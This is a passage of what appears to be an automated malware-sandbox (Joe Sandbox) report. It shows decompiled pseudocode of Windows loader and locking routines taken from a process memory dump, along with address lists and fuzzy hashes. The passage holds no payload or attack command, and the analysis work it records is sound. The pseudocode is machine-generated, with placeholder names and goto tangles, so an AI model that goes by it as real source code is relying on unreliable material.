				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1858714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01792EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01792EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E017658EC(_t240);
									_t221 =  *0x1855cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1855cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E017A4A2C(0x1856e40, 0x17a4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01787D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1745c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0179F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0179F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E017E7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01782400(_t267 + 0x20);
															}
															L01782400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01792397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01782280(_t134, 0x1858608);
									__eflags =  *0x1856e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0177FFB0(_t198, _t241, 0x1858608);
										__eflags = _t253;
										if(_t253 != 0) {
											L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1856e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1858608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01796B90(_t210,  &_v64);
										_t262 =  *0x1858608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0179E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E017A97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E017A006A(0x1858608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1858608);
												E017AB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1856904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1856e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0177FFB0(_t198, _t240, 0x1858608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E017A00C2(0x1858608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                              0x017920a0
                                                                              0x017920a8
                                                                              0x017920ad
                                                                              0x017920b3
                                                                              0x017920b8
                                                                              0x017920c2
                                                                              0x017920c7
                                                                              0x017920cb
                                                                              0x017920d2
                                                                              0x01792263
                                                                              0x01792266
                                                                              0x017d5836
                                                                              0x017d5836
                                                                              0x00000000
                                                                              0x0179226c
                                                                              0x0179226c
                                                                              0x01792270
                                                                              0x01792274
                                                                              0x017920e2
                                                                              0x017920e2
                                                                              0x017920e6
                                                                              0x017920ee
                                                                              0x017d57dc
                                                                              0x017d57de
                                                                              0x017d57ec
                                                                              0x017d57ec
                                                                              0x017d57f1
                                                                              0x017d57f3
                                                                              0x017d57f8
                                                                              0x00000000
                                                                              0x017d57f8
                                                                              0x017d57e0
                                                                              0x017d57e4
                                                                              0x017d57ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d57ea
                                                                              0x017920f4
                                                                              0x017920f4
                                                                              0x017920f8
                                                                              0x017920f8
                                                                              0x017920fc
                                                                              0x01792100
                                                                              0x01792106
                                                                              0x01792201
                                                                              0x01792206
                                                                              0x0179220b
                                                                              0x0179220e
                                                                              0x017922a9
                                                                              0x017922ac
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017922b2
                                                                              0x017922b5
                                                                              0x017d5801
                                                                              0x017d5806
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d5810
                                                                              0x017d5815
                                                                              0x017d5818
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d581e
                                                                              0x017922bb
                                                                              0x017922bb
                                                                              0x01792218
                                                                              0x01792218
                                                                              0x0179221c
                                                                              0x01792220
                                                                              0x01792222
                                                                              0x017922c2
                                                                              0x017922c4
                                                                              0x017922dc
                                                                              0x017922dc
                                                                              0x017922e1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017922e7
                                                                              0x017922c8
                                                                              0x017922cd
                                                                              0x017922d3
                                                                              0x017922d6
                                                                              0x017d5823
                                                                              0x017d5825
                                                                              0x017d5827
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d582d
                                                                              0x00000000
                                                                              0x017d582d
                                                                              0x00000000
                                                                              0x01792228
                                                                              0x01792228
                                                                              0x00000000
                                                                              0x01792228
                                                                              0x01792222
                                                                              0x01792214
                                                                              0x01792214
                                                                              0x00000000
                                                                              0x01792114
                                                                              0x01792114
                                                                              0x01792114
                                                                              0x0179211a
                                                                              0x0179211c
                                                                              0x01792348
                                                                              0x0179234d
                                                                              0x017d5840
                                                                              0x017d5845
                                                                              0x017d5848
                                                                              0x017d584e
                                                                              0x017d584e
                                                                              0x017d5848
                                                                              0x01792353
                                                                              0x01792355
                                                                              0x01792388
                                                                              0x01792388
                                                                              0x01792368
                                                                              0x0179236a
                                                                              0x0179236c
                                                                              0x0179238f
                                                                              0x00000000
                                                                              0x0179236e
                                                                              0x0179236e
                                                                              0x0179218e
                                                                              0x0179218e
                                                                              0x01792191
                                                                              0x01792195
                                                                              0x017d5a03
                                                                              0x017d5a06
                                                                              0x017d5a0c
                                                                              0x017d5a0f
                                                                              0x017d5a11
                                                                              0x017d5a13
                                                                              0x017d5a13
                                                                              0x017d5a19
                                                                              0x017d5a1f
                                                                              0x00000000
                                                                              0x0179219b
                                                                              0x0179219b
                                                                              0x017921a0
                                                                              0x01792282
                                                                              0x01792284
                                                                              0x01792284
                                                                              0x01792284
                                                                              0x01792284
                                                                              0x017921a6
                                                                              0x017921a9
                                                                              0x017921ac
                                                                              0x017921ae
                                                                              0x017921b3
                                                                              0x0179228b
                                                                              0x01792290
                                                                              0x01792379
                                                                              0x01792296
                                                                              0x01792298
                                                                              0x01792298
                                                                              0x01792290
                                                                              0x017921b9
                                                                              0x017921be
                                                                              0x017922a2
                                                                              0x017922a2
                                                                              0x017921c4
                                                                              0x017921c8
                                                                              0x017921cc
                                                                              0x017921d0
                                                                              0x017921d4
                                                                              0x017921de
                                                                              0x017921e3
                                                                              0x017d5a29
                                                                              0x017d5a2c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d5a3b
                                                                              0x00000000
                                                                              0x017921e9
                                                                              0x017921e9
                                                                              0x017921e9
                                                                              0x017921ee
                                                                              0x017921f1
                                                                              0x017d5a45
                                                                              0x017d5a4b
                                                                              0x017d5a52
                                                                              0x017d5a58
                                                                              0x017d5a5d
                                                                              0x017d5a5f
                                                                              0x017d5a71
                                                                              0x017d5a61
                                                                              0x017d5a6a
                                                                              0x017d5a6a
                                                                              0x017d5a76
                                                                              0x017d5a79
                                                                              0x017d5a7f
                                                                              0x017d5a83
                                                                              0x017d5a85
                                                                              0x017d5a87
                                                                              0x017d5a87
                                                                              0x017d5a8c
                                                                              0x017d5a91
                                                                              0x017d5a97
                                                                              0x017d5a9f
                                                                              0x017d5aa0
                                                                              0x017d5aa1
                                                                              0x017d5aa6
                                                                              0x017d5aab
                                                                              0x017d5ab1
                                                                              0x017d5ab3
                                                                              0x017d5ab9
                                                                              0x017d5aca
                                                                              0x017d5ad4
                                                                              0x017d5ad4
                                                                              0x017d5ade
                                                                              0x017d5ade
                                                                              0x017d5aab
                                                                              0x017d5a79
                                                                              0x017d5a52
                                                                              0x017921f7
                                                                              0x017921f9
                                                                              0x017921fe
                                                                              0x017921fe
                                                                              0x017921e3
                                                                              0x01792195
                                                                              0x0179236c
                                                                              0x01792122
                                                                              0x01792122
                                                                              0x01792124
                                                                              0x01792231
                                                                              0x01792236
                                                                              0x01792236
                                                                              0x01792238
                                                                              0x01792238
                                                                              0x01792240
                                                                              0x01792242
                                                                              0x01792244
                                                                              0x017d59fc
                                                                              0x0179218c
                                                                              0x0179218c
                                                                              0x00000000
                                                                              0x0179218c
                                                                              0x0179224a
                                                                              0x0179224f
                                                                              0x01792256
                                                                              0x01792304
                                                                              0x01792309
                                                                              0x0179230f
                                                                              0x0179231e
                                                                              0x0179231e
                                                                              0x0179231e
                                                                              0x01792320
                                                                              0x01792325
                                                                              0x0179232a
                                                                              0x0179232c
                                                                              0x0179233e
                                                                              0x0179233e
                                                                              0x00000000
                                                                              0x0179232c
                                                                              0x01792311
                                                                              0x01792317
                                                                              0x0179231a
                                                                              0x0179231c
                                                                              0x01792380
                                                                              0x01792380
                                                                              0x01792380
                                                                              0x01792384
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792386
                                                                              0x00000000
                                                                              0x0179231c
                                                                              0x0179225c
                                                                              0x0179225c
                                                                              0x00000000
                                                                              0x0179225c
                                                                              0x0179212a
                                                                              0x01792134
                                                                              0x01792138
                                                                              0x0179213d
                                                                              0x017d5858
                                                                              0x017d5863
                                                                              0x017d5863
                                                                              0x017d5867
                                                                              0x017d586a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d586c
                                                                              0x017d586c
                                                                              0x017d5871
                                                                              0x017d5875
                                                                              0x017d5877
                                                                              0x017d5997
                                                                              0x017d599c
                                                                              0x017d59a1
                                                                              0x017d59a7
                                                                              0x017d59a7
                                                                              0x00000000
                                                                              0x017d59a7
                                                                              0x017d587d
                                                                              0x00000000
                                                                              0x017d588b
                                                                              0x017d588b
                                                                              0x017d5890
                                                                              0x017d5892
                                                                              0x017d5894
                                                                              0x017d5899
                                                                              0x017d589b
                                                                              0x017d58a0
                                                                              0x017d58a0
                                                                              0x017d58aa
                                                                              0x017d58b2
                                                                              0x017d58b6
                                                                              0x017d58be
                                                                              0x017d58c6
                                                                              0x017d58c9
                                                                              0x017d590d
                                                                              0x017d5917
                                                                              0x017d591a
                                                                              0x017d591c
                                                                              0x017d5920
                                                                              0x017d5928
                                                                              0x017d592a
                                                                              0x017d592c
                                                                              0x017d592e
                                                                              0x017d592e
                                                                              0x017d58cb
                                                                              0x017d58cd
                                                                              0x017d58d8
                                                                              0x017d58e0
                                                                              0x017d58f4
                                                                              0x017d58fe
                                                                              0x017d58fe
                                                                              0x017d593a
                                                                              0x017d593e
                                                                              0x017d5940
                                                                              0x017d5942
                                                                              0x00000000
                                                                              0x017d5944
                                                                              0x017d5944
                                                                              0x017d5949
                                                                              0x017d594e
                                                                              0x017d594e
                                                                              0x017d5953
                                                                              0x017d595b
                                                                              0x017d5976
                                                                              0x017d5976
                                                                              0x017d597a
                                                                              0x017d597f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d5981
                                                                              0x017d5981
                                                                              0x017d5981
                                                                              0x017d5983
                                                                              0x017d5988
                                                                              0x017d598d
                                                                              0x017d5991
                                                                              0x017d5991
                                                                              0x00000000
                                                                              0x017d595d
                                                                              0x017d595d
                                                                              0x017d5963
                                                                              0x017d5965
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d5967
                                                                              0x017d5967
                                                                              0x017d596b
                                                                              0x017d596d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d596f
                                                                              0x017d5971
                                                                              0x017d5971
                                                                              0x017d5974
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d5974
                                                                              0x00000000
                                                                              0x017d5967
                                                                              0x017d595b
                                                                              0x017d5942
                                                                              0x017d5863
                                                                              0x01792143
                                                                              0x01792143
                                                                              0x01792149
                                                                              0x0179214f
                                                                              0x017922f1
                                                                              0x017922f6
                                                                              0x00000000
                                                                              0x01792173
                                                                              0x01792173
                                                                              0x0179217d
                                                                              0x01792181
                                                                              0x01792186
                                                                              0x017d59ae
                                                                              0x017d59b2
                                                                              0x017d59b5
                                                                              0x017d59b7
                                                                              0x017d59ba
                                                                              0x017d59cd
                                                                              0x017d59d1
                                                                              0x017d59d5
                                                                              0x017d59d9
                                                                              0x017d59db
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d59dd
                                                                              0x017d59dd
                                                                              0x017d59e1
                                                                              0x017d59e4
                                                                              0x017d59e7
                                                                              0x017d59ee
                                                                              0x017d59ee
                                                                              0x017d59f3
                                                                              0x017d59f3
                                                                              0x00000000
                                                                              0x01792186
                                                                              0x0179214f
                                                                              0x01792106
                                                                              0x01792266
                                                                              0x017920d8
                                                                              0x017920da
                                                                              0x017920e0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7038c16ecd2cb8310d7eaae090da828cc2fc74440a3a3b69bda7488ba9a5cf0e
                                                                              • Instruction ID: c56c7edc99586e1f11cd37556ef1aadc01424c296c3872f250216a419e539f84
                                                                              • Opcode Fuzzy Hash: 7038c16ecd2cb8310d7eaae090da828cc2fc74440a3a3b69bda7488ba9a5cf0e
                                                                              • Instruction Fuzzy Hash: C4F12671608301AFEB26DF2CD44476AFBF1AF85324F05855DE995DB282D734D848CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E0177D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x185d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01776600(0x18552d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1857b9c; // 0x0
							_t281 = L01784620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E017AF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1857b90; // 0x77090000
								if(_t384 == 0) {
									_t353 =  *0x1857b8c; // 0x1302a78
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01782280(_t200, 0x18584d8);
									_t277 =  *0x18585f4; // 0x1302f68
									_t351 =  *0x18585f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1302f00
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0177FFB0(_t287, _t353, 0x18584d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E017BCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01776600(0x18552d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01777926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x185b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E017EE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1858472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x185b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x185b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01782280(_t250, 0x18584d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L017A3898(0, _t288, _t366);
														} else {
